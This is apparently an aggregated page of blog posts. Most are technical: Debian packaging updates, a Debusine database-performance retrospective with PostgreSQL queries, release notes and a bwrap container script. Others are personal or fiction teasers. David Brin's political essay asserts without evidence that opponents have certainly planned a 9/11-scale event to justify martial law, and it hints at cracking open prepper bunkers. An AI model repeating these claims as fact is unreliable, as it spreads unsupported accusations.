Planet Russell


Charles Stross: A quiet patch ...

So, I had my second round of eye surgery, and it worked fine. I got a short distance lens, leaving me myopic, which was expected, and I've booked an ophthalmology appointment for the earliest possible date post-surgery (in mid-May; the eye needs to settle for six weeks post-op). In the meantime, I'm without visual correction.

And guess what? My vision is changing. My left eye is increasingly myopic, to the point where it's now difficult to read on screen. (And I can barely read with my right eye at all, due to a retinal occlusion that covers about half the visual field.) For writing/editing I've blown up the text size to 250%, which is just tolerable but gives me a headache after a while: new prescription specs can't come soon enough.

NB: don't suggest half-assing corrective lenses using off-the-shelf stuff, my eyes are kinda complex and I'm not just myopic, there's other stuff going on there. Also, don't suggest dictation software: I use a complex vocabulary and punctuation that aren't a normal part of the use case the designers of such software anticipated, i.e. business correspondence. And absolutely don't suggest podcasts or text-to-speech software: I can't absorb information that way. I'm fed up with people trying to convince me to try something I've tried repeatedly to use (and that has failed for me) over the past 30 years: it's irritating, not helpful.

... In other news: despite the above I'm still plodding along at book 2 of the proposed duology (but making very slow progress because writing 1000 words in a day is the new writing 4500 words in a day). And I'll be at Satellite 9 in Glasgow next month, probably before I have new glasses, so if you see me and I fail to make eye contact across a room it's not you: I'm just blind as a bat.

365 Tomorrows: Deecee

Author: Susan A. Anthony Voice slow and deliberate, the bot squatted beside their table added to their list of dessert options. “You may choose from blueberries, raspberries or cranberries.” “Is the fruit fresh?” whispered Martha to Ermintrude, her birth parent. Ermintrude barely opened her mouth to speak. “Only the cranberry,” replied the bot. Ermintrude, no […]

The post Deecee appeared first on 365tomorrows.


Rondam Ramblings: Seeking God in Science part 7: Information, Knowledge and Belief

We are now finally ready to tackle three of the thorniest topics the human intellect has ever grappled with, the concepts of information, knowledge, and belief.  The relevance of these concepts to the scientific search for God should be obvious, but I want to be explicit about it because, as ever in this series, we're going to apply the scientific method.  That always begins with the

Planet Debian: Colin Watson: Free software activity in April 2026

My Debian contributions this month were all sponsored by Freexian.

You can also support my work directly via Liberapay or GitHub Sponsors.

dput-ng

Ian Jackson reported that dput-ng could lose data when using the local install method (relevant in tests of other packages, for instance) and filed an initial merge request to fix it. I improved this to isolate its tests properly, and uploaded it.

groff

I upgraded from 1.23.0 to 1.24.1. 1.24.0 and 1.24.1 were the first upstream releases since 2023, and had extensive changes; I’d had the corresponding packaging changes in the works since January, but it took me a while to get round to finishing them off. It was good to get this off my list.

OpenSSH

I released bookworm and trixie fixes for CVE-2026-3497, and issued the corresponding BSA-130 for trixie-backports.

I upgraded from 10.2p1 to 10.3p1.

parted

I upgraded from 3.6 to 3.7. 3.7 was the first upstream release since 2023, but the changes were nowhere near as extensive as groff's, so this was a fairly quick job. I also fixed the parted-doc package to ship proper API documentation.

Python packaging

New upstream versions:

I started an upstream discussion about how best to handle the pydantic and pydantic-core packages now that they share an upstream git repository.

Other bug fixes:

Rust packaging

New upstream versions:

YubiHSM packaging

I upgraded from 2.7.2 to 2.7.3.

Code reviews

Cryptogram: LLMs and Text-in-Text Steganography

Turns out that LLMs are really good at hiding text messages in other text messages.

Worse Than Failure: Representative Line: A Solid Reference

Today's anonymous submitter works for a large company. It's one of those sorts of companies which has piles, and piles, and piles of paperwork and bureaucracy. It also means that much of their portfolio of software is basic CRUD applications. "Here's a database for managing invoices." "Here's a database for managing desk assignments." "Here's a pile of databases which link our legacy applications to our new ERP system."

Which brings us to our representative line. It is not a representative line of code, but a representative line of the design specification. This is the design specification for yet another database-driven application.

7.7 REFERENTIAL INTEGRITY CONSTRAINTS
Referential integrity constraints are not applicable for [REDACTED] Application.

Upon seeing this, our submitter predicted that they'd be having a lot of TDWTF submissions in their future.

The worst part? This isn't the only time this has been included in the design spec. Several database driven applications have had this line in their spec. No one is able to explain exactly why referential integrity constraints are not applicable. At best, there are a few batch jobs that don't define a schema themselves, though they need to comply with it. Maybe someone is just copying and pasting from an old design spec and hoping no one notices or cares?

Good news: it's likely that no one will notice, or care. At least not until something breaks in production.


365 Tomorrows: Dead in Dunstable

Author: Julian Miles, Staff Writer The armoured door slams back and Danny rushes in, leaving the door wedged open against the fire extinguisher. Sir Colin Masters, acting PM due to the sudden disappearance of PM and Rejuve Party leader Roland Fordham, sighs. Directives mandating discrete drone impact zones are all well and good, but when […]

The post Dead in Dunstable appeared first on 365tomorrows.

David Brin: Snowflake despair over ... court rulings? Sack-up! The fight will be elsewhere.

I planned to do a weekend post about how the insatiable (and thus insane) top oligarchs are sparking a worldwide revival of the moribund works of Karl Marx. (Alas.) And thusly they seem determined to reserve their rides on Uber Tumbrels.

But that will have to await another time. After I issue the next update of my book on AI... AILIEN MINDS.

Meanwhile, I have to address an even more dire phenomenon that's pervading the liberal-o-sphere. Something so silly and unjustified that it plays into the very hands of those seeking to wreck Enlightenment Civilization.

Despair.

     == The Role of the Courts ==


This essay (not one of mine) makes a strong argument that the Roberts Supreme Court has been betraying the American Republic in many ways, but above all… Two Supreme Court Decisions and the Dismembering of Madison’s Republic, by Earl R. Smith II, PhD. 


Though I think cynicism toward Democrats like Nancy Pelosi is not supported by their activities in 2021 and 2022, when - collaborating with Sanders/Warren/AOC etc. - they accomplished so much more than the left will ever credit. Just one matter - full funding of the IRS after 40 years of starvation - would seem to challenge the notion of DNC Dems enslaved to corporate interests. Since IRS funding was funneled into 'paid in advance' funds, those would have to be repealed by an act of Congress...

...and they were, alas! By a Republican Party that is now the most tightly disciplined partisan machine in the history of the republic.


Still, I won't deny that the American Republic -- indeed the entire Enlightenment Experiment that let us escape 6000 years of dreary feudalism -- is in deadly danger! Hence I have tried hard to fulfill my own task in all of this. To imagine possible ways to make things better.


Seriously, if you want to see 35 pragmatic and quickly actionable measures to repair the damage, see my full list of proposed Newer Deal tactics and reforms. And pass them on to folks who might act on them!

    


     == In despair? Go to a mirror and... ==


On this blog's comment thread, some are expressing despair. Especially now that the Roberts Supreme Court has stopped pretending to be anything other than a Confederate/Kremlin shill, led by our generation's Roger Taney. And sure, 1859 looked pretty dire, too. As did 1776, when the American Revolution was saved from the pit of despond by Thomas Paine, whose pamphlets - Common Sense and The American Crisis - girded the resolve of brave, shivering patriots to keep fighting for a dimly-perceived better world.

How can I reject despair? Especially when few of you - certainly not even one of the sanctimonious despair wallowers - will actually go and read the epochally stirring words that Paine wrote? As if speaking specifically to you?

Perhaps it is a matter of personality. Wherein I deem despair to be grotesque and somewhat inhuman. But also a kind of pathetically ingrate laziness. So unjustified, when we are typing or narrating into miraculous devices, in comfort with nearby snacks, breathing air that (in urban areas) is vastly better than it was when I was young, with a self-repairing ozone layer and yearly INCREASES in the number of trees on Earth...

... and (for now at least) freedom to research anything, and speak as we wish. For now, at least.

And sure, I read Jared Diamond's COLLAPSE about past civilization fails, more often than not due to environmental negligence, and I know what's at stake. Criminy, do YOU know anyone who has fought this fight harder and longer than I have? From EARTH to The Transparent Society and so on? (Maybe Kim Stanley Robinson.) So, I got some cred.

When solar/wind/tidal+batteries are plunging in price and rocketing in emplacement, it would seem the only thing saving carbon-based electricity is the damn data centers. Which I discuss in Ailien Minds, by the way.

The news is dire, yes. And so is the blatant desperation of the Putinist/Foxites, who can see that a vast majority of citizens are growing aware and angry, as in 1859, and no amount of gerrymandered cheating will save the Kremlin shills from an approaching political comeuppance.



== What the traitors will attempt ==

And so it is their villainous desperation that I fear! Because the Project 2025 SOBs will certainly - by now - have concocted a plan for some dire event - perhaps on a 9/11 scale or bigger - to 'justify' an emergency declaration of martial law. Why else would they have already - via Trump - fired or distracted a majority of counter-terror officials, agents, officers and JAGs?


The coming 'event' will only be prevented if they KNOW that we are ready and wary. That we will all hit the streets shouting "Reichstag Fire!"

... and "Appomattox!" And then do much more, to prove the stupidity of proto-feudalists who wage war on all the folks who know law and cyber... along with bio, chem, nuclear and every other potential recourse. And who know where every single prepper bunker lies, and how to crack them open. (Yes, we know, boys.)


Alas, did I mention "stupid"? As they surround themselves with flatterers who croon them into believing they will be immortal lords? That they can terrorize and terrify us into submission. Or coax the masses to blame all the fact professions, as in A Canticle for Leibowitz, instead of the delusional oligarchs who are doing all this?

So no, I am not a Pollyanna. I am shouting warnings!

But those who despair over some despicably partisan, election-cheat court rulings are staring at epiphenomena, not at the real danger.

No, those who despair are historical ignoramuses, too lazy to look at how past Hero Generations girded themselves for a fight that's worth grit and courage and pain, to win. Tom Paine, especially. But also Lincoln, FDR. The soaring words of Churchill and Eleanor Roosevelt... getting us on a path that might lead to the stars.

If I could, I would slap you glowering gloom-addicts silly! Till you get up off the couch and shout:


"Okay! Okay! I'll FIGHT instead of wallowing in desolate grumpiness! Now stop that or I'll slap you back! Let's go."



Planet Debian: Freexian Collaborators: Debusine workflow performance issues (by Colin Watson)

During March and April, we had a number of performance issues that made Debusine’s core functions of running work requests and reflecting their results in workflows quite unreliable. Investigating and fixing this took up a lot of time from both the Debusine development team and Freexian’s sysadmins.

The central problems involved a series of database concurrency and worker communication issues that interacted in complex ways. On bad days, this caused between 10% and 25% of processed work requests to fail unnecessarily. We communicated some of the problems to users on IRC, but not consistently since we didn’t entirely understand the scope of the problems at the time.

Most of the problems are fixed now, but we had a retrospective meeting to make sure we understood what happened and that we learn from it. Here’s a summary.

Data model

Debusine’s workflows consist of many individual work requests. Each work request has a database row representing its state, which means that the overall state of a workflow is distributed across many rows. Changes to one work request (for example, when it is completed) can cause changes to other work requests (perhaps unblocking another so that it can be scheduled to an idle worker). Those changes may happen concurrently, and in practice often do.

Workers typically need to create artifacts containing the output of tasks: these include things like packages, build logs, and test output.

Debusine records task history so that it can make better decisions about how to schedule work requests. Since this might otherwise grow without bound, the server expires older parts of that history after a while. The same is true for many other kinds of data.

Causes

  • Because workflows involve changes that propagate between work requests, there were historically some cases where different parts of the system could deadlock due to trying to take update locks on overlapping sets of work request rows in different orders. We mitigated that somewhere around 2025-11-05 by locking entire workflows in one go before making any change that might need to propagate between work requests like this; that dealt with the deadlocks, but it’s quite a heavyweight locking strategy that sometimes caused significant delays.

  • We’ve been working for some time to make Debusine useful to Debian developers, and regression tracking is an important part of that: it lets developers test uploads without being too badly misled by tests in related packages that were already failing before they started. On 2026-03-11 we enabled this by default on debusine.debian.net, after testing it for a while. Although this is useful, it put more load on the system as a whole, often approximately doubling the number of work requests in a given workflow with many additional dependencies between them.

  • Like much of the world, we’re in an arms race with unethical scrapers desperately trying to feed everyone else’s data into LLMs before they run out of money. We saw a substantial uptick here towards the end of March, which meant that we had to temporarily disable regression tracking and to put some other mitigations in front of our web interface.

  • We historically haven’t had systematic internal timeouts. Prompted by ruff, a Google Summer of Code applicant went through and added timeouts in many places, including some calls between the worker and the server. This was fiddly work and the student did a solid job, so I’m not putting them on blast or anything! However, it did mean that some things that came in under load balancer timeouts now timed out earlier on the client side of the request (and hence in Debusine workers), which made some problems show up in different ways and be more obvious. This was deployed on 2026-04-03.

Fixes

Workflow orchestration

Figuring out what individual work requests need to be run as part of a workflow - the process we call “orchestration” - can be challenging. Unlike typical CI pipelines, these workflows often span substantial chunks of a distribution: a glibc update can involve retesting nearly everything! Nevertheless, it’s not particularly helpful for it to take hours just to build the workflow graph.

Fixing this involved many classic database optimizations such as adding indexes and CTEs, but probably the most effective fix was adding a cache for lookups within each orchestrator run or work request. Profiling showed that resolving lookups was a hot spot, and the way that task data is often passed down through a workflow meant that the same lookup could be resolved hundreds or thousands of times in a large workflow.
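
As a rough illustration of the caching idea, a per-run memoisation table is enough to collapse those repeated resolutions into a single expensive computation each. The names below are hypothetical, not Debusine’s actual classes:

from dataclasses import dataclass, field

@dataclass
class OrchestratorRun:
    # Cache keyed by the lookup expression; it lives only for this run.
    _lookup_cache: dict = field(default_factory=dict)

    def resolve_lookup(self, expression, resolve_uncached):
        """Resolve a collection lookup, memoising the result for this run."""
        if expression not in self._lookup_cache:
            # resolve_uncached is the expensive database-backed resolution.
            self._lookup_cache[expression] = resolve_uncached(expression)
        return self._lookup_cache[expression]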

Expiry

We had known for quite some time that our expiry job took very aggressive locks, effectively blocking most of the rest of the system. This was the result of an early decision to make the expiry logic simpler by allowing it to follow graphs without worrying about concurrent activity, but it clearly couldn’t stay that way forever.

Reading up on row locks in PostgreSQL was very helpful in figuring out the correct approach here. Since we’re mainly concerned about the possibility of new foreign key references being created to artifacts we’re considering for expiry, and since that would involve taking FOR KEY SHARE locks on those rows, we can explicitly take FOR UPDATE locks (which conflict with FOR KEY SHARE), and then recompute the set of artifacts to expire with any locked artifacts marked to keep. This was delicate work, but it saved minutes of downtime every day.
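
One possible reading of that pattern, in Django ORM terms, looks roughly like the sketch below; the model and helper names are made up for illustration, and the real code is considerably more involved:

from django.db import transaction

def expire_artifacts(candidate_ids, compute_expiry_set):
    # Artifact is a stand-in for the relevant Django model.
    with transaction.atomic():
        # FOR UPDATE conflicts with the FOR KEY SHARE locks taken when a new
        # foreign key reference is created, so nothing can start referencing
        # these artifacts while we decide their fate.
        locked_ids = set(
            Artifact.objects.filter(id__in=candidate_ids)
            .select_for_update(skip_locked=True)
            .values_list("id", flat=True)
        )
        # Anything we could not lock is marked to keep and reconsidered later.
        to_delete = compute_expiry_set(locked_ids, keep=set(candidate_ids) - locked_ids)
        Artifact.objects.filter(id__in=to_delete).delete()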

Whole-workflow locking

I mentioned earlier that we avoided some deadlock issues by taking locks on entire workflows. To ensure that these locks are effective even against code that isn’t specifically aware of them, this is implemented by using SELECT FOR UPDATE on all the work request rows in the workflow. In some cases the search for which rows to lock itself tripped up the PostgreSQL planner.
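
In Django ORM terms the effect is roughly the following (with illustrative model and field names); because the work request rows themselves are locked, any other transaction touching the same rows blocks whether or not it knows about the convention:

from django.db import transaction

def lock_workflow(workflow_root_id):
    # WorkRequest is a stand-in for the relevant Django model.  Evaluating
    # the queryset issues SELECT ... FOR UPDATE; ordering by id keeps the
    # lock acquisition order deterministic across concurrent transactions.
    list(
        WorkRequest.objects.filter(workflow_root_id=workflow_root_id)
        .order_by("id")
        .select_for_update()
        .values_list("id", flat=True)
    )

def complete_work_request(work_request):
    with transaction.atomic():
        lock_workflow(work_request.workflow_root_id)
        # ... propagate state changes to dependent work requests here ...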

Scheduling

We run multiple Celery workers for various purposes. Some of them can do many things in parallel, but in some specific cases (notably the task scheduler) we only ever want a single instance to run at once. Unfortunately a bug in the systemd service meant that the scheduler often ran concurrently anyway! Once we fixed that, the scheduler logs became a lot less confusing.

When Debusine was small, it was reasonable for it to perform scheduling very aggressively, typically as soon as any change occurred to a work request or a worker that might possibly influence it. This doesn’t scale very well, though, and even though we tried to batch multiple scheduling triggers that occurred within a single transaction, it could still make debugging very confusing. We reduced the number of changes that would result in immediate scheduling, and deferred everything else to a regular “tick”.

The scheduler may not be able to assign a work request to an idle worker due to the workflow being locked. That isn’t a major problem in itself; it can just try again later. However, in very large workflows, we found that it often worked its way down all the pending work requests one by one finding that each of them was locked, which was slow and also produced a huge amount of log noise. It now assumes that if a work request is locked, then it might as well skip other work requests in the same workflow until the next scheduler run.
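
The skip logic amounts to something like this simplified sketch (not the actual scheduler code):

def schedule_pending(pending_work_requests, try_assign):
    """One scheduler pass over pending work requests."""
    locked_workflows = set()
    for work_request in pending_work_requests:
        if work_request.workflow_id in locked_workflows:
            # This workflow was already found to be locked during this pass,
            # so don't retry (and log about) every remaining request in it.
            continue
        if try_assign(work_request) == "workflow-locked":
            locked_workflows.add(work_request.workflow_id)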

Between them, these changes reduced the number of locks typically being held on debusine.debian.net by about 80%:

Lock graph

Worker refactoring

The Debusine worker has always been partially asynchronous, but while it was actually executing a task - in other words, most of the time, at least in busy periods - it didn’t respond to inbound websocket messages, causing spurious disconnections. We restructured the whole worker to be fully event-based.
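
The shape of that change, as a heavily simplified asyncio sketch rather than the actual worker code: the blocking task body runs in a thread, so the event loop keeps servicing websocket traffic instead of going silent for the duration of the task.

import asyncio

async def execute_task(task):
    # Run the blocking task body in a worker thread; the event loop stays
    # free to handle pings, cancellations and new messages meanwhile.
    return await asyncio.to_thread(task.run)

async def handle_messages(messages):
    # Inbound websocket messages keep being processed while a task runs.
    async for message in messages:
        print("handling", message)

async def worker_main(task, messages):
    await asyncio.gather(execute_task(task), handle_messages(messages))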

We also had to put quite a bit of effort into improving the path by which workers report work request completion, because if that hits a timeout then it can mean throwing away hours of work. We have some further improvements in mind, but for now we defer most of this work to a Celery task so that whole-workflow locks aren’t on the critical path.

Database write volume

One of our sysadmins observed that our database write volume was consistently very high. This was a puzzle, but for a long time we left that unexplored. Eventually we thought to ask PostgreSQL’s own statistics, and we found a surprise:

debusine=> SELECT relname AS table_name,
debusine->        n_tup_ins AS inserts,
debusine->        n_tup_upd AS updates,
debusine->        n_tup_del AS deletes,
debusine->        (n_tup_ins + n_tup_upd + n_tup_del) AS total_dml
debusine-> FROM pg_stat_user_tables
debusine-> WHERE (n_tup_ins + n_tup_upd + n_tup_del) > 0
debusine-> ORDER BY total_dml DESC
debusine-> LIMIT 20;
              table_name              | inserts |  updates   | deletes | total_dml
--------------------------------------+---------+------------+---------+------------
 db_collectionitem                    | 1418251 | 3578202388 | 3630143 | 3583250782
 db_token                             |   15143 |   11212106 |   11389 |   11238638
 db_workrequest                       |  386196 |    6399071 | 1820500 |    8605767
 db_fileinartifact                    | 2783021 |    1837929 | 1663887 |    6284837
 django_celery_results_taskresult     | 1819301 |    1501623 | 1791656 |    5112580
 db_artifact                          |  960077 |    3340859 |  663890 |    4964826
 db_collectionitemmatchconstraint     | 1550457 |          0 | 2207486 |    3757943
 db_artifactrelation                  | 2229382 |          0 | 1363825 |    3593207
 db_fileupload                        | 1023400 |    1057036 | 1023346 |    3103782
 db_file                              | 1673194 |          0 |  970252 |    2643446
 db_fileinstore                       | 1411995 |          0 |  970259 |    2382254
 db_filestore                         |       0 |    2381578 |       0 |    2381578
 django_session                       |  645423 |    1519880 |     531 |    2165834
 db_workrequest_dependencies          |  365877 |          0 |  936537 |    1302414
 db_worker                            |   18317 |     949280 |    9487 |     977084
 db_collection                        |   10061 |         85 |  177741 |     187887
 db_workerpooltaskexecutionstatistics |   28721 |          0 |       0 |      28721
 db_workerpoolstatistics              |    1640 |          0 |       0 |       1640
 db_workflowtemplate                  |     130 |        158 |     649 |        937
 db_identity                          |      76 |        661 |       0 |        737
(20 rows)

Oh my - that’s a lot of db_collectionitem updates and must surely be out of proportion with what we really need. Can we narrow that down by asking about the most recently-updated tuples?

debusine=> SELECT DISTINCT category
debusine-> FROM db_collectionitem
debusine-> WHERE id IN (
debusine->     SELECT id FROM db_collectionitem
debusine->     ORDER BY xmin::text::integer DESC LIMIT 10000
debusine-> );
           category
------------------------------
 debusine:historical-task-run
(1 row)

That might not be absolutely reliable, but it was certainly a hint. As per PostgreSQL’s documentation, by default UPDATE always performs physical updates to every matching row regardless of whether the data has changed, and our code to expire old task history entries wasn’t taking care to avoid such no-op updates. Once we knew where to look, it was easy to add some extra constraints.
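
The fix amounts to a guard like the following Django-flavoured sketch (the model and field names are made up; the category string is the one shown in the query above): filter out rows that are already in the target state so the UPDATE simply matches fewer rows.

def expire_old_task_history(cutoff):
    # Without the exclude(), rows that are already marked would still be
    # rewritten by PostgreSQL on every run, inflating the write volume.
    CollectionItem.objects.filter(
        category="debusine:historical-task-run",
        created_at__lt=cutoff,
    ).exclude(
        expired=True,
    ).update(expired=True)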

This reduced our mean write volume on debusine.debian.net from about 23 MB/s to about 3 MB/s, which had an immediate knock-on effect on our request failure rate:

Disk write graph

HTTP errors

Current state

Our metrics indicate that things are a lot better now. We still have a few things to deal with, such as:

  • Some more performance fixes are on their way to fix some remaining cases where views are very slow or where file uploads from workers fail due to locks.
  • We have some changes in the works to revamp how work request changes propagate through workflows in a way that doesn’t require so many heavyweight locks.
  • We have a number of monitoring and alerting improvements we’d like to make, both for outcomes (things like slow Celery tasks) and possible root causes (database performance). We’d also like to deploy some more modern observability tools; hunting for things using journalctl isn’t terrible, but it’s not really the state of the art.
  • We need to improve how we communicate to users when we’re having operational problems, both informally (IRC, etc.) and on the site.
  • Retries don’t always behave the way you’d expect in workflows.

I hope this has been an interesting tour through the sorts of things that can go wrong in this kind of distributed system!


Planet Debian: Steinar H. Gunderson: MySQL hypergraph optimizer

MySQL released (well, flipped the default compilation flag for) the hypergraph join optimizer in the community builds; this was the main project I started and worked on while I was there, so it's nice to see even though it's been default in e.g. their cloud column store for a long time. You can read their blog post (though beware, likely-LLM text ahead).

(The cost model improvements and TPC-DS benchmarking are from after my time.)

365 Tomorrows: Free Ducks

Author: R. J. Erbacher “So, what is it that makes you a god?” Well, let’s see. I’m pretty powerful. Can leap a tall building in one jump. “That makes you Superman, not a god.” I can kill you with a pencil. “Is that a serious answer?” OK, so we’re not the same species and yet […]

The post Free Ducks appeared first on 365tomorrows.


Planet Debian: Dirk Eddelbuettel: RcppSpdlog 0.0.29 on CRAN: Small Enhancement

Version 0.0.29 of RcppSpdlog arrived on CRAN today, and has been uploaded to Debian and built for r2u. The (nice) documentation site has been refreshed too. RcppSpdlog bundles spdlog, a wonderful header-only C++ logging library with all the bells and whistles you would want, written by Gabi Melman, and also includes fmt by Victor Zverovich. You can learn more at the nice package documentation site.

This release features a rewritten internal routine unpacking the R variadic arguments into C++ variadic template arguments. This in turn allows us to switch back to std::format when compiling as C++20. We also adjust for the not-quite-ready-for-this state of the x86-64 based macOS machine at CRAN: it runs a compiler and SDK combination that cannot fully deal with C++20, so we dial compilation down to C++17 there. Similarly, and as we found out after the release, Ubuntu jammy is also too old to default to std::format, so we need better detection there too so that we can fall back to the included fmt.

The NEWS entry for this release follows.

Changes in RcppSpdlog version 0.0.29 (2026-05-08)

  • Some small continuous integration updates

  • The internal formatter was rewritten as a recursive generator of variadic templates.

  • Switch back to std::format with C++20, but force inferior macos-release-x86_64 to use C++17 rather than default C++20 which fails

Courtesy of my CRANberries, there is also a diffstat report detailing changes. More detailed information is on the RcppSpdlog page, or the package documentation site.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Planet Debian: Jelmer Vernooij: Remove-after Annotations for Debian Files

deb-scrub-obsolete is a tool in the debian-codemods suite that tries to identify and remove cruft automatically. It knows about dummy transitional packages, superseded alternatives, and similar patterns it can detect by querying the archive. But some workarounds are too project-specific for a generic tool to recognise on its own.

Developers can leave structured comments in their packaging files that tell deb-scrub-obsolete when a particular line or block can be removed.

The Debian Janitor regularly runs various codemods like deb-scrub-obsolete on all vcs-accessible Debian packages. This means that if you leave a “remove-after: trixie” annotation in your package, you will automatically get a pull request to remove the annotated code once trixie has been released, without needing to remember to do it yourself.

The Comment Format

The annotations take the form of specially-formatted comments. For shell files (and by extension most maintainer scripts), a line-level annotation looks like this:

install -m 755 compat-wrapper /usr/lib/foo/  # remove-after: trixie

When trixie has been released, deb-scrub-obsolete will remove that line entirely. The comment can appear anywhere on the line — before or after other comments — and additional explanatory text can follow:

blah  # Trixie comes with blah built in # remove-after: trixie

For larger sections, block-level annotations bracket the code to remove:

# begin-remove-after: trixie
alternatives --add foo bar
alternatives --add foo bar1
# end-remove-after

These blocks can be nested, which is useful when one outer condition wraps several inner ones with finer-grained timing.

Expressions

The initial set of supported expressions is deliberately small. The main one is a Debian release name: remove-after: trixie means “once trixie has been released”. The condition is checked against distro-info (https://manpages.debian.org/trixie/distro-info/distro-info.1.en.html), the same data source that other Debian tooling uses to track release status.

The expression language is designed to be monotonic — conditions should only ever go from false to true, not back. A workaround that needs to be re-introduced after removal belongs in a new commit, not in an annotation. If deb-scrub-obsolete cannot parse an annotation it finds in a file, it leaves all annotations in that file untouched, to avoid a situation where related blocks are only partially removed.

Annotations can also carry a marker name — an arbitrary label with no spaces, commas, or the word “after” — which can then be passed to deb-scrub-obsolete on the command line. This makes it possible to trigger removal of a named set of annotations together, useful for coordinated transitions where several packages need to be cleaned up at the same time.
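
To make the format concrete, here is a toy Python sketch of how a tool might apply these annotations to a shell file. This is not deb-scrub-obsolete's implementation: it only handles the constructs shown above, and the caller supplies the set of satisfied expressions rather than querying distro-info.

import re

LINE_RE = re.compile(r"#.*\bremove-after:\s*(\S+)")
BEGIN_RE = re.compile(r"#\s*begin-remove-after:\s*(\S+)")
END_RE = re.compile(r"#\s*end-remove-after\b")

def scrub(lines, satisfied):
    """Return lines with satisfied remove-after lines and blocks dropped."""
    kept = []
    skip_depth = 0
    for line in lines:
        begin = BEGIN_RE.search(line)
        if begin:
            # A block nested inside one already being removed goes with it.
            if skip_depth or begin.group(1) in satisfied:
                skip_depth += 1
            else:
                kept.append(line)
            continue
        if END_RE.search(line):
            if skip_depth:
                skip_depth -= 1
            else:
                kept.append(line)
            continue
        if skip_depth:
            continue
        match = LINE_RE.search(line)
        if match and match.group(1) in satisfied:
            continue  # the whole annotated line is removed
        kept.append(line)
    return kept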

Future Extensions

The initial expression set is minimal; the design leaves room for richer conditions. Some candidates under consideration:

  • Whether a particular suite has a new enough version of a package (removing a Build-Depends version constraint once it is satisfied everywhere)
  • Whether a package has been removed from the archive
  • Whether all currently-supported releases contain a new enough version
  • Whether a Debian transition has completed

Compound expressions using “and” / “or” are also on the list, for cases where removal depends on multiple conditions being true simultaneously.

Status

The annotation format is specified but not yet implemented in deb-scrub-obsolete - it is planned for a future release. If you maintain Debian packages and have opinions on the annotation format or the expression language, feedback is welcome. The specification lives in scrub-obsolete/doc/scrub-annotations.md in the lintian-brush repository. Many thanks to Helmut Grohne for the initial suggestion and feedback on the design.

ME: Packaging Amazfish for Debian

I have done some packaging work on Amazfish (the smart-watch software that works with the PineTime among others) for Debian. Here is my Git repository for libnemodbus (a dependency for Amazfish that isn’t in Debian) [1]. Here is my Git repository for Amazfish itself [2].

These packages are currently using QT5 which is a good reason to not upload them now as the transition to QT6 is in progress. Patching them to work with QT6 (as the libnemodbus upstream is apparently not migrating to QT6 yet) shouldn’t be that difficult but is something that needs some care and communication to get it right.

Running this package on my laptop with my PineTime (which worked very reliably when run by GadgetBridge on Android) wasn’t reliable and the PineTime would disconnect and refuse to connect again. Doing it on the Furilabs FLX1s gave a similar result. If Amazfish was the only Bluetooth program having problems on my laptop and on my FLX1s then I’d blame it, but both those systems have some other Bluetooth issues.

Running this on my laptop, Amazfish would send its own test notifications to my watch, but system notifications (from notify-send among others) wouldn't get sent. Running this on my FLX1s I got ONE notification from my network monitoring system sent to my watch before my phone and watch stopped talking to each other.

To make things even more difficult for me the harbour-amazfish-ui program doesn’t work correctly with the libraries installed on my FLX1s and doesn’t display the content of many screens but it works correctly when running in a container environment with stock Debian/Testing.

Below is the script that I’m currently using to launch apps in a Debian/Testing container on my FLX1s. The comment about unshare-user doesn’t apply to this version of the script but I left it in to avoid the potential for future confusion. The Furilabs people diverted the bwrap binary and have a wrapper that removes a set of parameters that they think will cause problems.

#!/bin/bash
set -e

BUILDBASE=/chroot/testing

# bwrap: Can't mount proc on /newroot/proc: Device or resource busy
# get the above with --unshare-user and --unshare-pid
exec bwrap.real --bind /tmp /tmp --bind /run /run --bind $HOME $HOME \
  --ro-bind $BUILDBASE/etc /etc --ro-bind $BUILDBASE/usr /usr \
  --ro-bind $BUILDBASE/var/lib /var/lib \
  --symlink usr/bin /bin --symlink usr/sbin /sbin --symlink usr/lib /lib \
  --proc /proc --dev-bind /dev /dev --die-with-parent --new-session "$@"

Due to the range of problems I’m having I think it would be best to pass this package on to someone else who has a different test setup. It could be that further testing will reveal that my issues are related to bugs in Amazfish but I can’t prove it either way at this time. Maybe when using a smart watch other than a Pine Time it will work more reliably but it seems most likely that my laptop and phone are to blame. I can’t make more progress on this now.

ME: Bad Criticism of LLMs (not AI)

Discussion of “AI” systems seems to be dominated by fears of uncommon and unlikely threats. I think that we should be focusing more on real issues with LLMs and with society in general and put the most effort towards the biggest problems.

It’s Not AI

True Artificial Intelligence [1] (i.e. a computer that has the mental capacity of a household pet) is something that I think can be developed, but it hasn't been developed and we don't have good plans for developing it. We seem to be a lot further away from achieving that goal than we were from landing on the moon in 1962 when JFK gave his historic speech.

What we have is a variety of pattern recognition systems that can predict what fits into a pattern. The most well known type of Machine Learning (ML) is the Large Language Model (LLM), which means ChatGPT and similar systems that predict which text would be likely to come next and can make an essay from it. They can give interesting and useful output, but there is no thought behind it; it's just a better form of Eliza (the famous program from 1964 that simulates conversation by pattern matching) [2]. By analysing billions of documents, storing the data in a condensed mathematical way, and then using computation to extract from that record, LLMs can produce output that is unfortunately considered by some people to be good enough to include in legal documents submitted to courts, university assignments, and many other documents. But they do so without even having the thinking ability of a mouse.

To call current systems “AIs” without any significant qualifiers when criticising them is to concede the debate about the worth of such things.

If we develop AIs that can actually think we will have to deal with the issues in the SciFi horror short story Lena by qntm [3].

The Bad Arguments

Here is a list of some of the most unreasonable arguments I’ve seen against “AI” which distract attention from real problems both related to “AI” and other problems in society.

Suicide and Homicide

Wikipedia has a page listing Deaths Linked to Chatbots [4] which right now has 16 entries from 2023 to Feb 2026. They are all tragedies and as a society we should try to prevent such things. But what I would like to see from the media is some analysis of overall trends: yes, it gets people's attention when someone dies in an unusual way, but we need attention paid to the more numerous deaths which are preventable. It has become standard practice to give information on Lifeline in media referencing suicide; it would be good if they also developed a practice of mentioning the relative incidence of a problem when publishing an article about it.

One of the many factors that cause more suicides than chatbots is school; Scientific American has an informative article from 2022 about the correlation between child suicide and school [5]. It is based on US statistics and shows that the lowest suicide rate is in July (a no-school month in the US), which has a rate of 2.3 per 100,000 person-years. So if kids had a quality of life equivalent to July all year round there would be 2.3 suicides per 100,000 kids every year, while if they had a quality of life equivalent to a Monday in January or November it would be 3.9 suicides per 100,000 kids every year. The article states “Any time I present these data to teachers, parents, principals or school administrators, they are shocked. This should be common knowledge.” It is common knowledge to anyone who takes any notice of what happens in schools, but paying attention to serious problems is unpleasant; it's more fun to pretend that school is good for everyone. No parent wants to think that they sent their child to a place that was horrible, and no teacher wants to think that they are part of a system that harms kids.

